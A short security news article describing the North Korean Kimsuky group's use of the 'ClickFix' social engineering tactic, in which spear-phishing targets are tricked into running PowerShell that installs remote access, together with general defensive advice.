North Korean state-sponsored group Kimsuky, also known as Emerald Sleet or VELVET CHOLLIMA, has been identified as utilizing a new social engineering tactic called “ClickFix” to deliver malware to South Korean targets. This tactic involves users being tricked into clicking on a “Fix It” button to resolve a fake issue, which then leads them to execute a malicious script that downloads and runs malware on their devices without their knowledge.
The ClickFix tactic, which first emerged in the middle of 2024, has been increasingly used to distribute infostealers and dropper malware in targeted and widespread campaigns. This tactic targets Windows users predominantly but has also been observed affecting Linux and macOS users. Variations of the tactic include fake human verification challenges or prompts to install supposed security updates, ultimately leading users to unwittingly compromise their systems.
In a recent attack identified by Microsoft’s threat analysts, North Korean hackers have been engaging with targets, establishing communication, and sending spear-phishing emails with PDF attachments. Recipients are instructed to register their devices by opening PowerShell as an administrator and pasting code provided by the threat actors. Upon execution, the code installs a remote desktop tool and retrieves a certificate file with a hardcoded PIN from a remote server, enabling the attackers to access the compromised device and exfiltrate data.
This shift in tactics by the Emerald Sleet group indicates a strategic move towards targeting individuals involved in international affairs, NGOs, government agencies, and media outlets across various regions. While security awareness and anti-phishing training are crucial, organizations are advised to implement strict security measures such as attack surface reduction rules to mitigate the risk of falling victim to such attacks.
It is imperative for users to exercise caution and vigilance when interacting with suspicious emails or messages and to refrain from clicking on unknown links or downloading attachments from untrusted sources. By staying informed and adopting proactive security measures, individuals and organizations can better protect themselves against the evolving threats posed by cybercriminals like Kimsuky and their use of sophisticated social engineering tactics like ClickFix.